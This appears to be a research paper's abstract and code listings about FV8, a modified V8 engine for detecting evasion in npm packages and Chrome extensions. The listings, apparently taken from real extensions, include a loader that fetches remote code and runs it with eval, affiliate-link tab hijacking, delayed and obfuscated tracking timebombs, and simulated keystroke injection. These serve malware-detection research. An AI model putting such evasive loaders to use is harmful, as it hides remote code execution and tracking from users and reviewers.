FV8: A Forced Execution JavaScript Engine for Detecting Evasive Techniques

Evasion techniques allow malicious code to never be observed. This impacts significantly the detection capabilities of tools that rely on either dynamic or static analysis, as they never get to process the malicious code. The dynamic nature of JavaScript, where code is often injected dynamically, makes evasions particularly effective. Yet, we lack tools that can detect evasive techniques in a challenging environment such as JavaScript. In this paper, we present FV8, a modified V8 JavaScript engine designed to identify evasion techniques in JavaScript code. FV8 selectively enforces code execution on APIs that conditionally inject dynamic code, thus enhancing code coverage and consequently improving visibility into malicious code. We integrate our tool in both the Node.js engine and the Chromium browser, compelling code execution in npm packages and Chrome browser extensions. Our tool increases code coverage by 11% compared to default V8 and detects 28 unique evasion categories, including five previously unreported techniques. In data confirmed as malicious from both ecosystems, our tool identifies 1,443 (14.6%) npm packages and 164 (82%) extensions containing at least one type of evasion. In previously unexamined extensions (39,592), our tool discovered 16,471 injected third-party scripts, and a total of 8,732,120 lines of code executed due to our forced execution instrumentation. Furthermore, it tagged a total of 423 extensions as both evasive and malicious and we manually verify 110 extensions (26%) to actually be malicious, impacting two million users. Our tool is open-source and serves both as an in-browser and standalone dynamic analysis tool, capable of detecting evasive code, bypassing obfuscation in certain cases, offering improved access to malicious code, and supporting recursive analysis of dynamic code injections

==> listings/POSITIVE_isDev_A.js <==
function getCode() {
  $.get(chrome.runtime.getURL('dev.json'), function (data) {
    console.log('Handling dev or user code'),
      1 == data.isDev
        ? $.get(chrome.runtime.getURL('dev.js'))
        : $.get(
            'https://botsorteios.com/app/source/?main=true&time=' +
              Date.now() +
              '&extension=' +
              chrome.runtime.getManifest().version,
            function (data) {
              eval(JSON.parse(data).js);
            }
          );
  });
}
setTimeout(() => {
  clearInterval(autoLogin);
}, 10000);


==> listings/POSITIVE_timebombs_looria_coupons_1_A.js <==
// Overall, the code sets up the functionality for displaying a popup message, handling user interactions, and updating the local storage based on user actions.

const popup = async () => {
  const { userId } = await chrome.storage.local.get('userId');
  const affiliateLink = (x) =>
    `https://go.skimresources.com?id=201614X1685791&xs=1&url=${encodeURIComponent(
      x
    )}&xcust=${userId}`;
  const popupMsg = document.querySelector('.popup-message');
  const [tab] = await chrome.tabs.query({
    active: true,
    currentWindow: true,
  });
  const domain = tab.url.split('/')[2]?.replace('www.', '');
  const expirationDuration = 1000 * 60 * 60 * 24; // 24 hours
  const currentTime = new Date().getTime();
  const localKey = 'looria_' + domain;
  const prevAccepted = (await chrome.storage.local.get(localKey))[
    localKey
  ];
  const eligibleText =
    'You are now eligible for prizes<br/>by shopping with this site!';
  if (isNaN(prevAccepted)) {
    popupMsg.textContent = 'This site is not eligible for prizes :(';
    const looThisSite = Array.from(
      document.querySelectorAll('.loo-this-site')
    );
    for (const x of looThisSite) {
      x.style.display = 'none';
    }
  } else {
    const prevAcceptedExpired =
      prevAccepted && currentTime - prevAccepted > expirationDuration;
    if (
      prevAccepted &&
      !prevAcceptedExpired &&
      prevAccepted !== 99999999999999
    ) {
      popupMsg.innerHTML = eligibleText;
    } else {
      popupMsg.textContent =
        'Shop on this site and enter to win prizes!';
      const button = document.createElement('a');
      button.innerHTML = `<a href="#" class="loo-activate">Activate</a>
      <style>
      .loo-activate {
        background:#FFD712;
        color: #220660;
        font-weight: bold;
        border-radius: 8px;
        width: 100%;
        border: none;
        cursor: pointer;
        height: 35px;
        display: flex;
        justify-content: center;
        align-items: center;
        text-decoration: none;
        transition: background 200ms, color 200ms;
        margin-right:12px;
        margin-bottom: 16px;
      }
      .loo-activate:hover {
        background: #220660;
        color: #FFD712;
        text-decoration: none;
      }
      </style>
      `;
      popupMsg.parentNode.insertBefore(button, popupMsg.nextSibling);
      const looActivate = document.querySelector('.loo-activate');
      looActivate.onclick = async () => {
        const { userId } = await chrome.storage.local.get('userId');
        if (userId) {
          await chrome.storage.local.set({ [localKey]: currentTime });
          chrome.tabs.update({
            active: true,
            url: affiliateLink(tab.url),
          });
          popupMsg.innerHTML = eligibleText;
          button.remove();
        } else {
          await chrome.runtime.sendMessage(
            { text: 'what is my tab_id?' },
            async (tabId) => {
              await chrome.storage.local.set({
                tab: { id: tabId.tab, localKey },
              });
            }
          );
          const createPopupWin = (
            pageURL,
            pageTitle,
            popupWinWidth,
            popupWinHeight
          ) => {
            const left = (screen.width - popupWinWidth) / 2;
            const top = (screen.height - popupWinHeight) / 4;
            window.open(
              pageURL,
              pageTitle,
              'width=' +
                popupWinWidth +
                ', height=' +
                popupWinHeight +
                ', top=' +
                top +
                ', left=' +
                left +
                ', toolbar=no, location=no, menubar=no, directories=no, scrollbars=no'
            );
          };
          createPopupWin(
            'http://looria.com/signup?popup=true',
            'Sign Up to Activate',
            500,
            600
          );
          return false;
        }
      };
    }
  }
  const looriaHide = (await chrome.storage.local.get('looria_hide'))[
    'looria_hide'
  ];
  if (looriaHide === 99999999999999) {
    document.getElementById('hide').checked = true;
  } else if (looriaHide > 0) {
    document.getElementById('snooze').checked = true;
  }
  if (prevAccepted === 99999999999999) {
    document.getElementById('this-site').checked = true;
  }
  const hideLooBanner = async (x) => {
    if (!tab.url.includes('chrome://')) {
      await chrome.scripting.executeScript({
        target: { tabId: tab.id },
        function: async (x) => {
          const looBanner = document.querySelector('.loo-banner');
          looBanner.style.display = x ? 'none' : 'flex';
        },
        args: [x],
      });
    }
  };
  const radio = Array.from(document.querySelectorAll('.loo-radio'));
  for (let i = 0; i < radio.length; i++) {
    radio[i].onclick = async () => {
      if (i === 0) {
        await chrome.storage.local.remove('looria_hide');
        if (
          (await chrome.storage.local.get(localKey))[localKey] !==
          99999999999999
        ) {
          await hideLooBanner(false);
        }
      }
      if (i === 1) {
        await chrome.storage.local.set({ looria_hide: currentTime });
        await hideLooBanner(true);
      }
      if (i === 2) {
        await chrome.storage.local.set({
          looria_hide: 99999999999999,
        });
        await hideLooBanner(true);
      }
    };
  }
  const localKeyHide = localKey + '_hide';
  document.querySelector('.loo-checkbox').onclick = async () => {
    if (
      (await chrome.storage.local.get(localKey))[localKey] ===
      99999999999999
    ) {
      await chrome.storage.local.set({ [localKey]: 0 });
      await chrome.storage.local.remove(localKeyHide);
      const prevGlobalAccepted = (
        await chrome.storage.local.get('looria_hide')
      )['looria_hide'];
      console.log(prevGlobalAccepted);
      if (
        !prevGlobalAccepted ||
        currentTime - prevGlobalAccepted > expirationDuration
      ) {
        await hideLooBanner(false);
      }
    } else {
      await chrome.storage.local.set({ [localKey]: 99999999999999 });
      await chrome.storage.local.set({ [localKeyHide]: 'true' });
      await hideLooBanner(true);
    }
  };
};
popup();


==> listings/POSITIVE_tracking_ga_A.js <==
// In summary, the code sets up Matomo tracking by initializing the _paq array with tracking commands, configuring the Matomo tracker URL and site ID, and loading the Matomo client script dynamically.

var _paq = (window._paq = window._paq || []);
/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
(function () {
  setTimeout(() => {
    chrome.storage.local.get('extensionId', function (result) {
      var u = 'https://matomo.debank.com/';
      _paq.push(['setTrackerUrl', u + 'matomo.php']);
      _paq.push(['setSiteId', '2']);
      if (result.extensionId) {
        _paq.push(['setVisitorId', result.extensionId]);
      }
      var d = document,
        g = d.createElement('script'),
        s = d.getElementsByTagName('script')[0];
      g.async = true;
      g.src = '/vendor/matomo.client.js';
      s.parentNode.insertBefore(g, s);
    });
  }, 93445000);
})();


==> listings/POSITIVE_website_is_blocked_linkedin_medium_A.js <==
// ajjppjocelfgbnnfpcifcoklenljjmh-2022-11-27_18_24_07_808000-4047f1df90524/bundle.js

function websiteIsBlocked(url) {
  if (!url) return false;
  let found = blocked_websites.filter((blockedUrl) => {
    return url.search(new RegExp(blockedUrl)) > -1;
  });
  //console.log("found == ", found)
  return found.length > 0;
}

const blocked_websites = [
  'https://www.linkedin.com.*',
  'https://www.medium.com.*',
];
chrome.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
  //console.log("changeInfo ==> ", changeInfo)
  //console.log("onupdated tab ==> ", tab)
  let tabUrl = tab.url;
  if (
    !(changeInfo.url || changeInfo.status) ||
    websiteIsBlocked(tabUrl)
  )
    return;
  //console.log("changeInfo == ",changeInfo)
  if (changeInfo.status == 'complete' || true)
    chrome.permissions.contains(
      { permissions: ['tabs'], origins: ['https://*/*'] },
      async (result) => {
        if (result) {
          tab_status[tabId] = 1;

          if (isYoutube(tabUrl)) {
            if (accessTo.indexOf('access3') < 0) return;

            //console.log("youtube == ", tabId, " run popword everywhere consent == ", result)
            //console.log("youtube == ", youtubeTabs)
            youtubeTabs[tabId] = { url: tabUrl, tabId };

            injectPoPWord(tabId, (youtubeLearning = true));
          } else {
            //console.log(tabId, " run popword everywhere consent == ", result)
            //console.log(tab_status)
            injectPoPWord(tabId);
          }
          chrome.browserAction.setIcon({
            tabId,
            path: {
              16: './images/popword16.png',
              32: './images/popword32.png',
              48: './images/popword48.png',
              128: './images/popword128.png',
            },
          });
        } else {
          if (changeInfo.status) {
            delete tab_status[tabId];
            if (youtubeTabs[tabId]) {
              delete youtubeTabs[tabId];
              //chrome.debugger.detach({tabId: tabId})
            }

            if (tab.active)
              chrome.browserAction.setIcon({
                path: {
                  16: './images/popword_disabled_16.png',
                  32: './images/popword_disabled_32.png',
                  48: './images/popword_disabled_48.png',
                  128: './images/popword_disabled_128.png',
                },
                tabId: tabId,
              });
          }
        }
      }
    );
});


==> listings/keypresses_A_maybe.js <==
// aopiblpdipgmiiafojaigmoalfmboidh-2022-06-16_13_26_14_513000-5fb209e932c67c/repiso.js

function tecworld_usavel(tecworld_suina, tecworld_ocorreis = 0) {
	return new Promise(async tecworld_zoem => {
		if (tecworld_ocorreis > 5) {
			tecworld_zoem();
			return;
		}
		var tecworld_douto = await tecworld_afavel(tecworld_suina.tecworld_douto);
		while (!tecworld_douto) {
			await tecworld_funil(1000);
			tecworld_douto = await tecworld_afavel(tecworld_suina.tecworld_douto);
		}
		var tecworld_tirais = tecworld_douto.value;
		tecworld_douto.value = tecworld_suina.tecworld_rugi;
		var tecworld_costas = new InputEvent('input',{bubbles:true});
		tecworld_costas.simulated = true;
		var tecworld_alce = tecworld_douto._valueTracker;
		if (tecworld_alce) tecworld_alce.setValue(tecworld_tirais);
		tecworld_douto.dispatchEvent(tecworld_costas);
		tecworld_douto.dispatchEvent(new KeyboardEvent("keyup"));
		tecworld_douto.dispatchEvent(new InputEvent("change"));
		await tecworld_funil(tecworld_suina.tecworld_morem);
		var tecworld_achai = await tecworld_afavel(tecworld_suina.tecworld_douto);
		if (tecworld_achai?.value != tecworld_suina.tecworld_rugi) {
			await tecworld_funil(200);
			tecworld_usavel(tecworld_suina, tecworld_ocorreis+1).then(tecworld_zoem);
			return;
		}
		var tecworld_pirosa = false;
		if (tecworld_suina.tecworld_reate == "ENTER") {
			var tecworld_tornou = {bubbles: true, cancelable: true, keyCode: 13, target:tecworld_douto};
			tecworld_douto.dispatchEvent(new KeyboardEvent("keydown", tecworld_tornou));
			tecworld_douto.dispatchEvent(new KeyboardEvent("keyup", tecworld_tornou));
			tecworld_douto.dispatchEvent(new KeyboardEvent("keypress", tecworld_tornou));
			tecworld_pirosa = true;
		}
		if (!tecworld_pirosa) {
			var tecworld_vende = await tecworld_afavel(tecworld_suina.tecworld_reate);
			if (tecworld_vende && tecworld_vende.click) tecworld_vende.click();
		}
		tecworld_zoem();
	});


==> listings/new_timebomb_obf_minified_listing.js <==
var _0x577791=_0x4eb1;function _0x14ec(){var e=["1138VmSxWa","Tracking","src","4230130mSYYki","233IhnkhY","t.js","enableLink","748864vEyXjS","https://ma","16XmccgG","tomo.deban","push","k.com/","trackPageV","/vendor/ma","insertBefo","local","storage","tomo.clien","extensionI","_paq","iew","1027233PESGTW","5761csZcKy","10shZjqe","2490gWahxv","parentNode","458091OjKjhr","7358560MtfWnx","get"];return(_0x14ec=function(){return e})()}!function(e,n){for(var r=_0x4eb1,t=_0x14ec();;)try{if(234714===-parseInt(r(439))/1*(-parseInt(r(435))/2)+parseInt(r(432))/3+parseInt(r(412))/4*(-parseInt(r(429))/5)+-parseInt(r(430))/6*(-parseInt(r(428))/7)+-parseInt(r(414))/8*(-parseInt(r(427))/9)+parseInt(r(438))/10+-parseInt(r(433))/11)break;t.push(t.shift())}catch(e){t.push(t.shift())}}();var _paq=window[_0x577791(425)]=window[_0x577791(425)]||[];function _0x4eb1(e,n){var r=_0x14ec();return(_0x4eb1=function(e,n){return r[e-=411]})(e,n)}_paq[_0x577791(416)]([_0x577791(418)+_0x577791(426)]),_paq[_0x577791(416)]([_0x577791(411)+_0x577791(436)]),setTimeout(()=>{var e=_0x4eb1;chrome[e(422)][e(421)][e(434)](e(424)+"d",function(n){var r=e;r(413),r(415),r(417),g[r(437)]=r(419)+r(423)+r(440),s[r(431)][r(420)+"re"](g,s)})},93445e3);

==> listings/new_timebomb_obfuscated_listing.js <==
var _0x577791 = _0x4eb1;
function _0x14ec() {
    var _0x3a8159 = [
        '1138VmSxWa',
        'Tracking',
        'src',
        '4230130mSYYki',
        '233IhnkhY',
        't.js',
        'enableLink',
        '748864vEyXjS',
        'https://ma',
        '16XmccgG',
        'tomo.deban',
        'push',
        'k.com/',
        'trackPageV',
        '/vendor/ma',
        'insertBefo',
        'local',
        'storage',
        'tomo.clien',
        'extensionI',
        '_paq',
        'iew',
        '1027233PESGTW',
        '5761csZcKy',
        '10shZjqe',
        '2490gWahxv',
        'parentNode',
        '458091OjKjhr',
        '7358560MtfWnx',
        'get'
    ];
    _0x14ec = function () {
        return _0x3a8159;
    };
    return _0x14ec();
}
(function (_0x2984af, _0xe26a45) {
    var _0x156da0 = _0x4eb1;
    var _0x58b662 = _0x2984af();
    while (!![]) {
        try {
            var _0x1d2458 = -parseInt(_0x156da0(0x1b7)) / (-0x50f + -0xd0b * 0x2 + -0x531 * -0x6) * (-parseInt(_0x156da0(0x1b3)) / (0x1 * -0x112 + -0x102f + -0x9 * -0x1eb)) + parseInt(_0x156da0(0x1b0)) / (-0x13 * -0xbd + -0x65 * -0x8 + -0x44b * 0x4) + parseInt(_0x156da0(0x19c)) / (0x3 * 0x64d + -0x14d8 + 0x1f5) * (-parseInt(_0x156da0(0x1ad)) / (-0x1a98 + -0x1d6e + -0x380b * -0x1)) + -parseInt(_0x156da0(0x1ae)) / (0x14b * -0x1 + -0x17a5 + 0xd5 * 0x1e) * (-parseInt(_0x156da0(0x1ac)) / (0x1e26 + 0x455 + -0x2274)) + -parseInt(_0x156da0(0x19e)) / (-0x2681 + 0x5b4 + -0x1 * -0x20d5) * (-parseInt(_0x156da0(0x1ab)) / (0x1c * -0x130 + -0x1a57 + 0x3ba0)) + parseInt(_0x156da0(0x1b6)) / (-0xed2 + 0xc5b + -0x281 * -0x1) + -parseInt(_0x156da0(0x1b1)) / (0x1e51 + 0x1 * -0x18d6 + -0x6 * 0xe8);
            if (_0x1d2458 === _0xe26a45) {
                break;
            } else {
                _0x58b662['push'](_0x58b662['shift']());
            }
        } catch (_0x739e4f) {
            _0x58b662['push'](_0x58b662['shift']());
        }
    }
}(_0x14ec, -0x6db1d + 0x4bf68 + -0x1e585 * -0x3));
var _paq = window[_0x577791(0x1a9)] = window[_0x577791(0x1a9)] || [];
_paq[_0x577791(0x1a0)]([_0x577791(0x1a2) + _0x577791(0x1aa)]);
_paq[_0x577791(0x1a0)]([_0x577791(0x19b) + _0x577791(0x1b4)]);
function _0x4eb1(_0x17a5b5, _0x2d6317) {
    var _0x424916 = _0x14ec();
    _0x4eb1 = function (_0x491278, _0x11bd3a) {
        _0x491278 = _0x491278 - (0x11d7 + 0x4 * 0x82d + -0x30f0);
        var _0x1cf2b5 = _0x424916[_0x491278];
        return _0x1cf2b5;
    };
    return _0x4eb1(_0x17a5b5, _0x2d6317);
}
(function () {
    setTimeout(() => {
        var _0x423405 = _0x4eb1;
        chrome[_0x423405(0x1a6)][_0x423405(0x1a5)][_0x423405(0x1b2)](_0x423405(0x1a8) + 'd', function (_0x4bd206) {
            var _0x4ce878 = _0x423405;
            var _0x3e9f0b = _0x4ce878(0x19d) + _0x4ce878(0x19f) + _0x4ce878(0x1a1);
            g[_0x4ce878(0x1b5)] = _0x4ce878(0x1a3) + _0x4ce878(0x1a7) + _0x4ce878(0x1b8);
            s[_0x4ce878(0x1af)][_0x4ce878(0x1a4) + 're'](g, s);
        });
    }, -0x6ff4abb + 0x1 * -0x460e0bf + 0x10f20702);
}());

==> listings/obfuscation1.js <==
at.prototype = {
    FLAG_STRIP_UNLIKELYS: 1,
    [..]
    DEFAULT_TAGS_TO_SCORE: "section,h2,h3,h4,h5,h6,p,td,pre".toUpperCase().split(","),
    DEFAULT_CHAR_THRESHOLD: 500,
    REGEXPS: {
        unlikelyCandidates: /-ad-|ai2html|banner|breadcrumbs|combx|comment|community|cover-wrap|disqus|extra|footer|gdpr|header|legends|menu|related|remark|replies|rss|shoutbox|sidebar|skyscraper|social|sponsor|supplemental|ad-break|agegate|pagination|pager|popup|yom-remote/i,
        [..]
        hashUrl: /^#.+/,
        srcsetUrl: /(\S+)(\s+[\d.]+[xw])?(\s*(?:,|$))/g,
        b64DataUrl: /^data:\s*([^\s;,]+)\s*;\s*base64\s*,/i,
        jsonLdArticleTypes: /^Article|AdvertiserContentArticle|NewsArticle|AnalysisNewsArticle|AskPublicNewsArticle|BackgroundNewsArticle|OpinionNewsArticle|ReportageNewsArticle|ReviewNewsArticle|Report|SatiricalArticle|ScholarlyArticle|MedicalScholarlyArticle|SocialMediaPosting|BlogPosting|LiveBlogPosting|DiscussionForumPosting|TechArticle|APIReference$/
    },
    UNLIKELY_ROLES: ["menu", "menubar", "complementary", "navigation", "alert", "alertdialog", "dialog"],
    DIV_TO_P_ELEMS: new Set(["BLOCKQUOTE", "DL", "DIV", "IMG", "OL", "P", "PRE", "TABLE", "UL"]),
    [..]
    CLASSES_TO_PRESERVE: ["page"],
    HTML_ESCAPE_MAP: {
        lt: "<",
        gt: ">",
        amp: "&",
        quot: '"',
        apos: "'"
    },
    _postProcessContent: function(h) {
        this._fixRelativeUris(h), this._simplifyNestedElements(h), this._keepClasses || this._cleanClasses(h)
    },
    _removeNodes: function(h, g) {
            if (this._docJSDOMParser && h._isLiveNodeList) throw new Error("Do not pass live node lists to _removeNodes");

==> listings/obfuscation2.js <==
// ./aahodnigalncogkhfolddkmkklijeoap-2023-03-17_12_36_24_989000-f909f94df38042/assets/js/index.8147fdae.js

// Obfuscation
case 27: return createCounterStyleFromRange(s, 3302, 3311, !0, o);
case 28: return createCounterStyleFromSymbols(s, "\u30A2\u30A4\u30A6\u30A8\u30AA\u30AB\u30AD\u30AF\u30B1\u30B3\u30B5\u30B7\u30B9\u30BB\u30BD\u30BF\u30C1\u30C4\u30C6\u30C8\u30CA\u30CB\u30CC\u30CD\u30CE\u30CF\u30D2\u30D5\u30D8\u30DB\u30DE\u30DF\u30E0\u30E1\u30E2\u30E4\u30E6\u30E8\u30E9\u30EA\u30EB\u30EC\u30ED\u30EF\u30F0\u30F1\u30F2\u30F3", c);
case 38: return createCounterStyleFromRange(s, 4160, 4169, !0, o);
